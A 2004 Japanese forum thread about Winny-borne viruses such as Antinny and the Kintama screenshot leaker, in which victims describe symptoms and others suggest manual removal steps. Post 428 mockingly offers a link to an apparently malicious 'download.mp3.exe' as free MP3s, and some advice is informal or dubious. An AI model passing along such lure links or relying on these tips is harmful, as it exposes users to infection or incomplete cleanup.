アクセス不能になって、4G〜数十メガのやはりわけのわからん文字のファイルが大量に出来て
こちらもアクセス不能。

一度そのドライブを再フォーマットしたが、しばらくするとまた同じドライブに同じ症状が
ウイルスチェックにはひっかからず不思議と他のドライブには被害が無いんだが
こりゃ全部再フォーマットぽっいな。特に2度目はexeファイルなんか一切つついてないから怖すぎ


356 :[名無し]さん(bin+cue).rar:04/03/11 02:43 ID:D85Fdhx7
そのパーテーションだけフォーマットしたの?

357 :[名無し]さん(bin+cue).rar:04/03/11 02:52 ID:mpPrm6sL
>>355
キャッシュドライブだけをフォーマットしたの?
システム・レジストリに入り込んでるから再インストールじゃない。
あと原因になりそうなことしたの?
みんな、それが知りたいはずw

358 : [名無し]さん(bin+cue).rar:04/03/11 03:28 ID:tXq0BtQJ
ぬるぽやられた

359 :[名無し]さん(bin+cue).rar:04/03/11 03:32 ID:dJ9DHeS9
HD全デリのウイルスに感染したんですけど、どうすればいいのでしょうか?

360 :[名無し]さん(bin+cue).rar:04/03/11 03:53 ID:HJLsfk51
涙で枕をぬらす

361 :[名無し]さん(bin+cue).rar:04/03/11 07:10 ID:hXfk0KBi
盗んだバイクで走り出す

362 :[名無し]さん(bin+cue).rar:04/03/11 07:58 ID:waD/efaX
覚えたての煙草を吹かす

363 :[名無し]さん(bin+cue).rar:04/03/11 09:20 ID:hvSiCrwZ
覚えたてのバイクでぬらす

364 :[名無し]さん(bin+cue).rar:04/03/11 09:21 ID:Mily6gqG
盗んだ枕をふかす

365 :[名無し]さん(bin+cue).rar:04/03/11 10:02 ID:HJLsfk51
覚えたての盗んだ枕で煙草をぬらす

366 :[名無し]さん(bin+cue).rar:04/03/11 10:22 ID:hqpQpL/c
坂下千里写真集(捏造)にもアンチーニ
が入っていた。マカフィーが反応してくれた。

367 :[名無し]さん(bin+cue).rar:04/03/11 10:38 ID:3BwjaWM4
坂下千里子をぬらす

368 :[名無し]さん(bin+cue).rar:04/03/11 10:43 ID:WAI5N47U
知らないファイルがダウソされてた ((((( ゜д゜)))))ガクガクブルブル
しかもその中に漏れがny使ってる場面が画像ファイルとしてまぎれてた。
デスクトップから、時々血が噴き出すような感じになるんだけど。
PC乗っ取られたかな(o^^o)何故か再インスコしたら、途中でエラー発生。
******.dllがコピーできませんとかなんとか。

369 :[名無し]さん(bin+cue).rar:04/03/11 10:44 ID:EgEbSgo8
知らないファイルがダウソされてた坂下千里子をぬらす

370 :[名無し]さん(bin+cue).rar:04/03/11 10:45 ID:fQmDMWHO
>((((( ゜д゜)))))ガクガクブルブル

ワラタ なんだこれは?

371 :[名無し]さん(bin+cue).rar:04/03/11 11:01 ID:2L3DH0ll
>>370
この時期は新種の亜種多発ですなw

372 :[名無し]さん(bin+cue).rar:04/03/11 16:29 ID:sTm9vz22
UPフォルダ削除したらBBS2ってのができてて
そこからデスクトップのスクリーンショットとかUPしてるみたいで
フォルダの位置を確認してもそこにはBBS2ってフォルダ無いんだけど
どこにあるんですか?

373 :[名無し]さん(bin+cue).rar:04/03/11 17:04 ID:qA9+KhQu
((((( ゜д゜)))))ガクガクブルブル

((((;゚Д゚)))ガクガクブルブル













( ゜Д゜)

374 :[名無し]さん(bin+cue).rar:04/03/11 17:40 ID:54dTXQN7
mp3をlzhで流さないでください
downするのに勇気が要ります。

375 :[名無し]さん(bin+cue).rar:04/03/11 19:44 ID:hXfk0KBi
あえてlzhで流してお前の度胸をためしてるのさ
男は度胸!なんでもやってみるものさ

376 :[名無し]さん(bin+cue).rar:04/03/11 20:13 ID:yWC87T3u
たかがlzhごときでそんなにビビるな
中を見て怪しければ削除すればいいだけのことじゃないか。
大体、lzhじゃなければ大丈夫と思って安心してるのか?

ウィルス職人のみなさ〜ん!
これからの狙い目はzipとかrarでっせ〜〜〜


377 :[名無し]さん(bin+cue).rar:04/03/11 22:16 ID:4yMNXEun
>>355
俺もおんなじようなことが起きた。フォーマットしてOS再インスコしても
時間がたつとシステムがこわれたりユーザプロファイルが
壊れたりしてくる。FDISKからやってみたがだめっぽい。

思い当たるのは直前にぬるぽにやられたくらい。
一応全部駆除したつもりなんだけどなぁ。

378 :[名無し]さん(bin+cue).rar:04/03/11 22:28 ID:oypsUQUh
亜種のウィルス感染がここで2個も・・・
(((li゚д゚)))ガクガクブルブル
トレンドに連絡すればなんかしてくれるかも

379 :[名無し]さん(bin+cue).rar:04/03/11 22:47 ID:wXkG3eVP
女、子供かよ
.lzhでキャッキャッ言ってるのはw

380 :[名無し]さん(bin+cue).rar:04/03/11 23:04 ID:P3OQzGzQ
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.e.html

↑こいつに感染してしまったようなんですが手順通りにやっても駆除できません
つーかスキャンでひっかからない

381 :355:04/03/11 23:13 ID:VXnhZP12
症状がさらに進んで別ドライブもアクセス不能に。
こちらはドライブそのものが例のわけのわからん文字になって
ドライブごとアクセス不能。OS再インストールも効果なし。
最初にアクセス不能になったドライブはスキャンディスクをかけると
.CHKファイルが大量にできて極窓にかけると1割くらい復旧できた。
今度はドライブにアクセスできないからスキャンディスクも無理なんで腐朽したまんまっぽい。
サイズ見るとほんとに元ファイルなんだが再生は他のファイルになってたりして
ちょっとだけ再生できたりするのが余計悔しい。いっそ一思いに殺してくれ。

>>356 >>357
そのドライブのみフォーマットでした。
状況から一過性のEXEタイプかと思ったもんで。
今思えばまだ無事なうちにいくらかでもバックアップしとけばよかったんだけど
まあ、nyから足を洗う踏ん切りついたんでよかったかな。
原因はかなり前にWINRARアイコン+拡張子が見えない長い名前というベタな
手にかかってAntinnyを踏んだからっぽいです。
ただそれだとかなり間をおいての発祥なのが気になるけど。
一応、踏んだあとこのページ上の対処+ウイルスバスター+ノートン検索
したのに再発してるから新種かも。


>>377
フォーマット+再インストも駄目ですか。
こりゃ本気で誰かの報告待ちかな。

382 :[名無し]さん(bin+cue).rar:04/03/12 00:17 ID:dGTcXTHN
>>380 ブラクラ貼るな ヴォケ

383 :377:04/03/12 00:23 ID:8Wqu9D7e
>>381
俺んとこは2000と98SEをデュアルでブートできるようにしていたんだけど
立ち上げてた2000のパーテーションがまずだめになりOSがないよとPCに言われて
98SE側から立ち上げると355のように無意味なでかいファイルやフォルダだったはずなのに
小さいサイズのファイルになってたりしてディレクトリがやられたんかな、と思った。
で、FOUND.000みたいなフォルダにXXXXXX.CHKみたいなファイルがいっぱい
できててこりゃだめだとOS再インスコ。
その後98SEのほうも再インスコしたりいろいろやったが、いまだに長時間立ち上げてると
システムが壊れてくる。

だんだん記憶も薄れてきたが上記みたいな感じ。

幸いny本体とは別のパーテーションにキャッシュやダウンフォルダを設定していたので
データは無事だったがエンコしたての映画が何本かあぼんしたのが痛かった。

しばらく様子見てどうしてもだめなら最終手段としてMacでフォーマットしてからPCに
戻してみる。(つもり)

384 :私の宿命:04/03/12 00:23 ID:SQg/BiYg
>>372
>UPフォルダ削除したらBBS2ってのができてて
>フォルダの位置を確認してもそこにはBBS2ってフォルダ無いんだけど
矛盾していませんか。

隠し属性になっている場合もあります。

>>380
パターンファイルを最新版に更新しましたか。
また、スキャン対象をシステム全体にしましたか。

385 :sage:04/03/12 01:13 ID:obIPFSLo
知らないファイルがダウソされてた ((((( ゜д゜)))))ガクガクブルブル
んでもってその中にデスクトップのスクリーンショットが画像ファイルとしてまぎれてた。

誰か同じような経験無い?
((((( ゜д゜)))))ガクガクブルブル
((((( ゜д゜)))))ガクガクブルブル


386 :[名無し]さん(bin+cue).rar:04/03/12 01:17 ID:bMia4wut
>>385
なんかの冗談くぁ?

387 :380:04/03/12 01:24 ID:3+z2msZJ
>>384
両方やったけど駄目ですた

388 :[名無し]さん(bin+cue).rar:04/03/12 01:28 ID:obIPFSLo
>>386

マジダヨマジ。
すげー恐いよ。

((((( ゜д゜)))))ガクガクブルブル
((((( ゜д゜)))))ガクガクブルブル

389 :[名無し]さん(bin+cue).rar:04/03/12 01:38 ID:dsecACDj
>>388
前スレに同じような書き込みあったような。

まぁ、貴様のPCは覗き放題ってこった。
((((( ゜д゜)))))ガクガクブルブル

390 :[名無し]さん(bin+cue).rar:04/03/12 03:37 ID:rBTIDUR+
>>20
激しく遅レスだが漏れもなってる(-_-)
リネームしてmp3聴こうとしたが途中から始まってるし…
コレの駆除方法と修復方法きぼん…マジで…

391 :[名無し]さん(bin+cue).rar:04/03/12 03:42 ID:WSIsLZ81
画面から血が噴き出してくるんだけど・・・
ちょっと楽しいけど誰か助けてくれ!!

392 :[名無し]さん(bin+cue).rar:04/03/12 03:55 ID:CHcu42Mf
>>391
コワッ

393 :[名無し]さん(bin+cue).rar:04/03/12 04:03 ID:bTN2nz+c
>>391
ハイテクだな、最近のディスプレイには流血機能がついてるのか

394 :[名無し]さん(bin+cue).rar:04/03/12 04:12 ID:Pcr0YE5M
>>393
無駄にハイテクだな

395 :[名無し]さん(bin+cue).rar:04/03/12 04:22 ID:g/d4WjzS
HDを物理的に攻撃するウィルスってありますか?

396 :[名無し]さん(bin+cue).rar:04/03/12 04:24 ID:FVSTpJCq
HDを精神的に攻撃するウィルスは無いと思うよ

397 :[名無し]さん(bin+cue).rar:04/03/12 04:27 ID:w/wx1m3o
消去をかけるWhiterよりも、読み書きで負荷を掛けるWinnyの方がよっぽどHDDを物理的に攻撃してる。

398 :[名無し]さん(bin+cue).rar:04/03/12 04:30 ID:ROEwkrXe
>>397
Whiter=レイプ
Winny=SM

って感じでどうよ?

399 :391:04/03/12 04:31 ID:WSIsLZ81
うーん ねたじゃないんだけどなぁ
このすれでも過去2回同じ症状が書いて歩けどスルーされてるし・・・

とりあえずregedit.exeがnotepad.exeに書き換えられてたので
インストールcdからregeditコピーしてぁゃιぃ児童起動ソフトけしました。
まぁこれでログオン後のHDDにめちゃくちゃアクセスするのがなくなったのでよしとしよう。

血みるとびびるからやめてくれ。

400 :[名無し]さん(bin+cue).rar:04/03/12 04:51 ID:ROEwkrXe
>>399
とりあえずスクリーンキャプチャきぼん

401 :[名無し]さん(bin+cue).rar:04/03/12 08:10 ID:obIPFSLo
391氏の症状は改善されましたか?!

402 :391:04/03/12 09:07 ID:wAiYGBQD
再インスコしたら治りマスタ

403 :[名無し]さん(bin+cue).rar:04/03/12 11:54 ID:9FLhpoRz
(ALBUM アルバム 洋楽)Spiritualized - Amazing Grace.zip 62,126.479バイト
Antinny入り

404 :391 :04/03/12 14:53 ID:WSIsLZ81
>>401
一応再インスコせずに治りますた。

>>400
すまんが治しちまった。
パンドラ系DLしまくって試みてくれたい。


またきょーからういりーだい!( ´-)y-~~

405 :[名無し]さん(bin+cue).rar:04/03/12 15:00 ID:8iET5XAj
今ぶっ壊れてもいいPCでウイルスを集めてるんですがマイナーでお勧めなものってありますか?


406 :[名無し]さん(bin+cue).rar:04/03/12 15:20 ID:rE89BxTs
>>405
その後君が何をするかの返答次第

407 :[名無し]さん(bin+cue).rar:04/03/12 15:27 ID:UZji1ZpE
>>385
それって自分のデスクトップの画像なの?
だとしたら怖いなー
完全に進入されてるじゃん
PCでやってること全部覗かれてんのか・・・
(((( ;゜Д゜)))ガクガクブルブル

408 :[名無し]さん(bin+cue).rar:04/03/12 15:31 ID:1O1i2VjA
フォルダだと思いダブルクリックしてしまってウイルスに感染してしまった。。 >>1のリンクに書かれてる通り調べたけどレジストリとか変わってないし何も起きてない… 他にこんなひといる?

409 :[名無し]さん(bin+cue).rar:04/03/12 15:49 ID:GKPOpeIZ
>>407
トロイだろうな。
ルータ入れとけば大丈夫だろう。

410 :[名無し]さん(bin+cue).rar:04/03/12 15:51 ID:T26xlJYT
>>408
時限爆弾式もあるからウィルスチェックしといたほうがいいんじゃない。

411 :[名無し]さん(bin+cue).rar:04/03/12 16:33 ID:w/wx1m3o
>>405
今日の日付で流れてるエロゲーは全部に何か入ってるよ。


412 :[名無し]さん(bin+cue).rar:04/03/12 18:10 ID:obIPFSLo
>>407

おそらく、侵入ではなく、backgroundで何か変なprogramでも走っていて
printscreen実行されているのでは?

413 :385.388.401.412:04/03/12 18:27 ID:obIPFSLo
385.388.401.412だけど、色々動きを見てたら不思議だね。
というのも、LANCableを抜いてネットワークから切り離してても
その画像が出きてるのね。

414 :391 :04/03/12 19:34 ID:WSIsLZ81
ちなみに俺の例でもデスクトップの画像ファイルは作成されてたよ。

415 :[名無し]さん(bin+cue).rar:04/03/12 19:47 ID:2luQ/gPL
今日起動したらupフォルダが11個あったんだが
ぬるぽか?
レジにara-key無し

416 :413:04/03/12 20:30 ID:obIPFSLo
同じ事例やね(o^^o)

417 :[名無し]さん(bin+cue).rar:04/03/12 21:31 ID:xD0q2mAX
>>413>>414と同じ症状。
ちなみにny起動すると架空の共有フォルダ「BBS2」が現れる。フォルダパスも架空。
そのフォルダにはスクリーンショットとか詰め込まれてた。
システム復元してみると架空だったフォルダが出現。
それを削除すると、ny起動で架空の「BBS2」が作成されるが何も入ってなくて、
フォルダを開こうとすると「存在しない」旨のメッセージが出る。

418 :[名無し]さん(bin+cue).rar:04/03/12 22:10 ID:xBYRgp4O
http://www.lyricsdomain.com/download.mp3.html
このページはウィルスと関係あるのでしょうか?

419 :[名無し]さん(bin+cue).rar:04/03/12 22:18 ID:vMq16P0u
winnyが作動せず削除しようとすると
「windowsが使ってます」と書かれるなぜだ(切実)

420 :[名無し]さん(bin+cue).rar:04/03/12 22:24 ID:xD0q2mAX
>>419
タスクみれ

421 :[名無し]さん(bin+cue).rar:04/03/12 22:26 ID:vMq16P0u
>>420
ファイルの削除のエラーと書かれている

422 :[名無し]さん(bin+cue).rar:04/03/12 22:27 ID:ML1VSOz3
みんなノートン2004買おうよ!

423 :[名無し]さん(bin+cue).rar:04/03/12 22:31 ID:7m5dDQGR
Winnyを狙ったワーム・ウイルス情報以外はスルーで

424 :[名無し]さん(bin+cue).rar:04/03/12 22:34 ID:3GKitLAP
最近ウィルス入りにも相当な参照数ついてる場合が多々あるな…


425 :[名無し]さん(bin+cue).rar:04/03/12 22:44 ID:vMq16P0u
(null)と書かれたノードファイルがある

426 :[名無し]さん(bin+cue).rar:04/03/12 23:43 ID:ABCSN+IF
>>418の効果は?

427 :[名無し]さん(bin+cue).rar:04/03/13 02:30 ID:OdtEhuqd
>>377
>>355

俺も前に同じ状況になったんだけど。
(一部のフォルダが文字化けしてアクセス不能に。
再起動するとチェックディスクで勝手に消される)

ちなみにそのバグったハードディスクの容量は?あとOSは何?

俺はこれ↓が原因だとふんでパッチあてて安心してるんだけど違うのかな。
http://support.microsoft.com/default.aspx?scid=kb;ja;331958

428 :オナニスト ◆MRmxpjiK.2 :04/03/13 02:34 ID:O+nk8Vc8
http://www.lyricsdomain.com/download.mp3.exe
>>418
そのサイトこれがもらえるみたいだね。
MP3詰め合わせだったよ!もうけもんだね







プゲラw

429 :[名無し]さん(bin+cue).rar:04/03/13 02:37 ID:OL3QcRHm
ノートン2004にしてアップデートできなくなったんだけど

俺だけ?

430 :[名無し]さん(bin+cue).rar:04/03/13 04:34 ID:jQG7oVTE
>>429
あれほど拾いモノのノートンは入れるなと警告したのに・・・・
しーらないっと

431 :[名無し]さん(bin+cue).rar:04/03/13 04:45 ID:OL3QcRHm
え?
どうなるの?

432 :[名無し]さん(bin+cue).rar:04/03/13 04:57 ID:e/SykfUx
>>431
>>192

433 :[名無し]さん(bin+cue).rar:04/03/13 05:14 ID:OL3QcRHm
マジで怖いから誰かマジレスしてくらはい。

434 :[名無し]さん(bin+cue).rar:04/03/13 05:45 ID:F4WrPJWM
今winny起動したら
「新しいバージョンのwinnyノード接続が〜」の警告が!
どういうことだ!?2.0b7.1が最終バージョンじゃないのか!?

435 :[名無し]さん(bin+cue).rar:04/03/13 05:45 ID:poIWbPTL
誤ってexeを起動してしまいました。Winnyのフォルダ内にUpFolder.txtが
作成され、テキスト内に[BBS]Path=C:\Documents and Settings\Owuer\
デスクトップ\Winny2\Downと記述されます。W32.HLLW.Antinny系のウイル
スだと思うのですが、レジストリに異状はなくc:\windows\win.ini内にも
「ぬるぽ」はありません。テキストを消してもOSを再起動、Winnyの起
動で再びUpFolder.txtが発生します。最新のウイルス定義にもひっかかり
ません。実害は今のところダウンフォルダ内のファイル(ダウンしたウイ
ルス付ファイル)をかってにアップしてしまうことなのですが、対策はあ
りますか?

436 :[名無し]さん(bin+cue).rar:04/03/13 05:52 ID:U+NlOFcC
>>435
自分もやっちゃって、システムの復元でなおった気がしてる…。
とりあえず勝手にアップはしなくなった。
他にもなんかしてるかもしんないけど…。

437 :[名無し]さん(bin+cue).rar:04/03/13 05:52 ID:TGAnyGm0
os reinstall

438 :[名無し]さん(bin+cue).rar:04/03/13 05:58 ID:FBMXmPMW
>>433
そんなに怖いのなら手を出すなと言う事だ

>>434
それは紛れも無いクラックの仕業であろう

439 :[名無し]さん(bin+cue).rar:04/03/13 06:57 ID:5iVw1Dac
>>435
レジのara-key削除

440 :427:04/03/13 10:11 ID:OdtEhuqd
他に同じ症状のやついないのかな?
BigDrive+パッチ未適用のせいだったのかどうか確かめたいんだけど。

441 :[名無し]さん(bin+cue).rar:04/03/13 10:15 ID:HQ2DFSxx
daemonの調子が良くない。イメージが中途半端に動かない。
何かに引っ掛かったのかな?

442 :427:04/03/13 10:24 ID:OdtEhuqd
関係ないかもしれないけど俺はチェックディスクのあとその症状になった。
イメージファイル自体が破損している可能性アリ。

キャッシュが残ってるならそれを変換し直したもの
(あるいは破損してないことが確認されてるもの)でマウントし直してみ。

443 :[名無し]さん(bin+cue).rar:04/03/13 13:13 ID:3tpgig2i
ダウンロードが出来なくなったりダウンロードしたファイルが使えなくなるウィルスってありますか?


444 :[名無し]さん(bin+cue).rar:04/03/13 14:19 ID:RdQ8tTB5
ある。システム再インストール推奨。

445 :[名無し]さん(bin+cue).rar:04/03/13 14:42 ID:H3JBm1ds
うわあ ぬるぽだらけだよ

446 :[名無し]さん(bin+cue).rar:04/03/13 14:46 ID:99ZsIcQe
誤ってexe起動する馬鹿は氏んでいい

447 :[名無し]さん(bin+cue).rar:04/03/13 14:55 ID:3tpgig2i
>>444
OS再インストですか?

448 :355:04/03/13 14:56 ID:9vfHVI89
あれから自エンコ分がどうしても諦めきれずファイナルデータとかいうのを購入。

消えたハードディスクのパーテッション3つのうち
355の症状で消えたドライブはファイル検索できるも復活させてもファイルは壊れてて実行できず
ただ、リカバリーレコードのあるRARなんかは修復できたので
そんなに大きく書き換えられてわけではないのかも。

残りの2パーテのうちは
FAT32のドライブ検索でパーテッションの存在すら出てこない。
NTFSの方は完全に復元できるみたい。

随分バラエティーに富んだ消え方だな。

>>383
症状そんな感じです。フォルダ名の意味のわからんファイルも出てき始めました
同じウイルスくらったぽいですね。
うちも98SEと2000のディアルブート。それぞれ別のハードディスクに入れて
あったけど飛んだのはさらに別のデータ専用ドライブ〔3台目〕のみ。
自エンコ分の被害甚大なのが最悪。

>>408
それ見て思い出したんだがRARアイコンのほかにそついも踏んだかもしれん。
なんか開けんフォルダあるなとか思って消したファイルがあった覚えあるんで。
必要なファイルはバックアップとってフォーマットしてインストしなおしたほうがいいかも。

449 :[名無し]さん(bin+cue).rar:04/03/13 15:12 ID:9vfHVI89
>>427
すまん。見落としてた。Windows2000 で 160G

450 :[名無し]さん(bin+cue).rar:04/03/13 15:16 ID:S1mLlY3V
>>414
>ちなみにny起動すると架空の共有フォルダ「BBS2」が現れる。フォルダパスも架空。
>そのフォルダにはスクリーンショットとか詰め込まれてた。

架空なのになんでスクショが入ってるって分るの?

451 :[名無し]さん(bin+cue).rar:04/03/13 16:11 ID:VQwAZZrE
CDをマウントしたら自動的にbug.exeが生成され
再起動するたびにファイルを削除されるウイルスに感染したんだけど
具体的な対処法って何?

452 :[名無し]さん(bin+cue).rar:04/03/13 16:13 ID:VS8mOWlC
そのCD捨てる

453 :[名無し]さん(bin+cue).rar:04/03/13 16:42 ID:LUpzUeq7
自業自得

454 :[名無し]さん(bin+cue).rar:04/03/13 16:50 ID:gGF7tHY9
Regseeker
ttp://www.hoverdesk.net/freeware.htm
RegSeeker1.3Beta日本語ファイル
ttp://downloads.at.infoseek.co.jp/

NTREGOPT
ttp://home.t-online.de/home/lars.hederer/erunt/
NTREGOPT日本語化ファイル
ttp://hp.vector.co.jp/authors/VA010593/download.html

Regseekerは世界的にも広く使われているレジストリ清掃ツールです
清掃したあとはNTREGOPTで最適化→再起動
初心者にもおすすめ!!

455 :[名無し]さん(bin+cue).rar:04/03/13 17:35 ID:pMtbZerR
デリーターにやられちゃった・・・

456 :[名無し]さん(bin+cue).rar:04/03/13 18:11 ID:EAJSylfG
>>385
[キンタマ] 俺のデスクトップ ログイン名.jpg?

457 :[名無し]さん(bin+cue).rar:04/03/13 19:22 ID:2NSI1ahc
>>451
http://mxtrojan.at.infoseek.co.jp/column02.html

458 :[名無し]さん(bin+cue).rar:04/03/13 21:08 ID:pMtbZerR
このソフトまだ発売してないけどもしかして神ソフトになるか?
ttp://www.intercom.co.jp/recovery/index.html

459 :[名無し]さん(bin+cue).rar:04/03/13 21:20 ID:xLWVgYlr
setup.exeという名前ノファイルをうっかり起動してしまい、
ユーザーデータ(メール系とかIEお気に入りなど)、プログラムファイル、システムファイル、
downフォルダ、IME辞書などが全て削除されました。
復元ツールも消されていますが、
もうこれは完全にアウトということでしょうか(OS起動はできる状態です)

460 :[名無し]さん(bin+cue).rar:04/03/13 21:39 ID:5d/+QTv2
>>459
もし私があなただったら、ここで聞く前にまず、復旧できるかどうかを自分で確かめます。
なぜ、自分で調べもせず、試しもせずにすぐ人に聞こうとするのか。そこが一番の問題。

ps
復旧のためのツールにはこのようなものもあります。
ttp://www.vector.co.jp/magazine/softnews/020601/n0206013.html
できればデータを削除されたドライブとは別のドライブにインストールした方が良いでしょう。
復活させたいデータのあるドライブへのアクセスは極力避けるべきです。

461 :[名無し]さん(bin+cue).rar:04/03/13 22:02 ID:UgtV+Lpj
[キンタマ] 俺のデスクトップ (ファイル詰め合わせ) .zip
↑で地引すると怪しいファイルがたくさん落ちてきます
本名・住所・電番
口座番号とパスワードってのもありました。
お前らも気をつけろ

462 :[名無し]さん(bin+cue).rar:04/03/13 22:25 ID:eSkie+y6
>>461
お前と違って最低限の常識はあるから心配すんな

463 :276:04/03/14 00:09 ID:4cQhs2Cl
例の幽霊女の件ですが
能豚をインスコしてチェックさせたところ
1D9.tmp
AKARI1.exe
syscheck.exe
system.1st
というジョークプログラム(Joke.Hikaru)が見つかりました。

それでタスクマネージャを見てみるとsyscheck.exeがあったので削除しますた。
これでもう幽霊女は出ないと思いまつ。
みんなも気をつけてオクレ

system.1stはFINALDATA 2.0 Office Premium.zip3.77 MB (3,958,397 バイト)に入ってたみたいでつ
www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=37287

464 :[名無し]さん(bin+cue).rar:04/03/14 02:04 ID:E+K1ykMn
なにが「能豚」だか・・・
こんな厨はどんどん淘汰してほしいわ

465 :427:04/03/14 02:11 ID:EeNRcFRv
>>355
そのとんだパーティションが全部160Gのやつのものなら、
それがBigDriveのバグって可能性もあると思われ。

よくわからんけどOSが2000 sp3/sp4またはXP sp1でさらにパッチをあてないと
BigDriveのデータが破損する不具合があるみたい。

466 :427:04/03/14 02:16 ID:EeNRcFRv
ようするに俺の推測が正しければ、今後も突如ファイル破損が起こる可能性があるかも、と。

>>355
確証が欲しいのでサービスパックやバグフィックスパッチの適用状況を
教えていただけませんでしょうか。

467 :[名無し]さん(bin+cue).rar:04/03/14 10:26 ID:RjQxnvU2
キンタマ・ウィルス

468 :[名無し]さん(bin+cue).rar:04/03/14 10:52 ID:njYyZPye
陰金?

469 :[名無し]さん(bin+cue).rar:04/03/14 14:18 ID:DAD6ytGY
キンタマにやられた

470 :355:04/03/14 14:38 ID:wMYX6BYd
消えてたドライブもドライブごと詳細にクラスタ検索かけると復活できるみたい。
こいつらがウイルス作ったんじゃねーかと思うくらいファイナルデータの
復元力つよいな。なんか逆に怖いかも。

>>465
確かに3パーテとも160GドライブですがSP4適用済みだったはずです。
その後のアップデートも要求があれば即実行してました。
OSは当然正規品です。

471 :[名無し]さん(bin+cue).rar:04/03/14 14:52 ID:GBL9TRc2
ぐはぁ キャッシュが60Gほど飛んだ 最悪だ
これからは即消ししよ

472 :427:04/03/14 15:33 ID:EeNRcFRv
>>355
情報どうも。
http://support.microsoft.com/default.aspx?scid=kb;ja;331958とのことなんだけど
どうやら2000なら関係ないのかなぁ。よくわからん。

>>355の症状が↑のせいじゃないってことは
俺の症状も↑のせいじゃなくウイルスだったって可能性もあるわけか。

放置してるけど大丈夫かなホント。

473 :[名無し]さん(bin+cue).rar:04/03/14 16:55 ID:toHycvMJ
 >>209さんが報告されたのと、似たようなの引っかかってしまい、
自己解決しましたので報告しておきます。

 症状自体は>>209さんが報告されたものとほとんど同じで、Win.ini
に登録される記述も同じ、実行されるプログラム名だけが異なると
いうものです。
 実行されるプログラム名はintel_autorun.exeで、レジストリのrunの
項目に同ファイルを自動実行する項目が付け加えられていました。
 レジストリの内容を修正し、二度ほど再起動してみましたが、修正
後は隠しのupフォルダが追加されることもありませんので、おそらく
は駆除できたものと思われます。
 件のファイルのファイルサイズは200704byte、タイムスタンプは
96/5/21となっており、ProgramFiles\intel\の中に入っていました。

 なお、ノートン及び、ウィルスバスターのオンラインスキャンでの
発見駆除は不可。手動で対処するしかないようです。


474 :[名無し]さん(bin+cue).rar:04/03/14 17:40 ID:cE1Zvr11
CG集とかに時々入ってる
Thumbs.db
っていうのは安全なんですか?

475 :[名無し]さん(bin+cue).rar:04/03/14 17:55 ID:oCaqbZUp
209さんや473さんと同じのにやられたみたいだが、
c:\windows\win.ini ファイルの末尾に
[hoge]
hugo=d:\winny (←うろ覚え)という記述が追加されている。

が追加されとらん・・だけどUpfolder.txtが追加され、自分のダウンフォルダをアップ
しちゃうぞ・・どこをどうすりゃいいのか・・・

>>474
ぐぐって調べてみた。
Windowsを利用している場合に作成される隠し属性のファイルです。
何の為に存在するかというと、フォルダ内のHTMLファイルや画像のサムネイルを保存しておくものです。
これがあることにより、次回から一度サムネイルされたものを高速に表示するようになります。
キャッシュみたいなものですね。
これは削除しても動作にはなんの影響も及ぼしません。
サムネイルのたびに勝手にファイルが生成されますが(^^;

との事。安全無害。

476 :[名無し]さん(bin+cue).rar:04/03/14 17:57 ID:gm2k6rwq
>475
HDDの空きが少ない人にとっては有害かもね。

477 :[名無し]さん(bin+cue).rar:04/03/14 18:06 ID:qDH246nD
>>471
はぁ?何言ってんだ
お前はWinnyやるな 
60Gのキャッシュと一緒に消えろ 氏ね

478 :473:04/03/14 18:24 ID:toHycvMJ
>>475
取り合えずノートンとかウィルスバスターとかで全スキャンしてみて
それで駆除できれば良し。
それで駄目なようなら一度ウィルス(ワーム)に勝手に作成された
upフォルダなどを削除してから再起動。
再起動直後にタスクマネージャーを起動し、エクスプローラーで
Winnyフォルダを監視して、upフォルダが追加される直前に高いCPU
占有率を示したプログラムをタスクマネージャーのプロセス画面
で洗い出し、該当するプログラムがレジストリのrunの部分に追加
されていないかチェックしてみる、とかすると良いと思います。
私はこの方法でウィルスのプログラムを見つけ出しました。

479 :475:04/03/14 18:34 ID:oCaqbZUp
473氏、アドバイスありがとうございます。
試してみます。

480 :[名無し]さん(bin+cue).rar:04/03/14 19:04 ID:toREH8MX
>>476
たまにユーザー名が書き込んである事も有るしな。

481 :[名無し]さん(bin+cue).rar:04/03/14 19:20 ID:3p+EtcjJ
Cドライブの空き容量が20Mぐらい増えたり減ったりするんだけど、ウィルス?
それともそういうもんなの?

482 :[名無し]さん(bin+cue).rar:04/03/14 20:28 ID:sq7e4vuO
タスクマネージャー開くと一瞬CPU使用率100%ってのが見えてその後一桁に戻るんですが、これは仕様ですか?

無知な質問ですみません…

483 :[名無し]さん(bin+cue).rar:04/03/14 20:36 ID:Bquv8Zgj
>>482
Windowsの仕様

484 :[名無し]さん(bin+cue).rar:04/03/14 20:37 ID:HsgW7LqN
>>474
VIX使ってサムネイル表示した時に出る、あのゴミファイルのようなもんだろ

485 :[名無し]さん(bin+cue).rar:04/03/14 20:45 ID:sq7e4vuO
>>483
仕様ですか、ありがとうございます


486 :[名無し]さん(bin+cue).rar:04/03/14 20:51 ID:sUX4eE44
コミックとかでThumbs.dbを一緒に圧縮してる池沼は氏ね。
アレだけで1MB近く喰ってる時あるし。

487 :[名無し]さん(bin+cue).rar:04/03/14 21:58 ID:vSeZUFU/
お尋ねします。antinnyって、発見が2003年8月ということですが・・・
それより以前にあったという話、聞いたことありませんか?
先日手に入れたファイルをチェックしたところ、見事に感染してたんですが
作成日時    2002年11月20日、6:06:30
更新日時    2002年11月20日、19:13:54
となっていました。中身のタイムスタンプも見てみたんですが、
更新日時    2001年11月6日、17:47:38
となっていました。作成日はさっき解凍したので今現在になってます。
そんな前からantinnyは存在していたのでしょうか?

488 :[名無し]さん(bin+cue).rar:04/03/14 22:03 ID:SjV6dhcA
    /\___/ヽ   ヽ
   /    ::::::::::::::::\ つ
  . |  ,,-‐‐   ‐‐-、 .:::| わ
  |  、_(o)_,:  _(o)_, :::|ぁぁ
.   |    ::<      .::|あぁ
   \  /( [三] )ヽ ::/ああ
   /`ー‐--‐‐―´\ぁあ

489 :[名無し]さん(bin+cue).rar:04/03/14 22:20 ID:Mlbvt0a0
釣りだって!釣り!リアクションはノンノン。スルーでGO

490 :487:04/03/14 22:37 ID:vSeZUFU/
ああ、やっぱ釣りと取られるか・・・・
では感染ファイルとして報告しときますね。
サイズ 691,923,846 バイト rar圧縮
中の「1.bin」が感染してます。ファイル名の一部に「マスター」という単語あり。
持ってる方、ご注意

491 :[名無し]さん(bin+cue).rar:04/03/14 22:47 ID:h/HECnFA
タイムスタンプなんていかようにもなるだろ。

492 :[名無し]さん(bin+cue).rar:04/03/14 22:48 ID:vl0Mhh8A
>>486
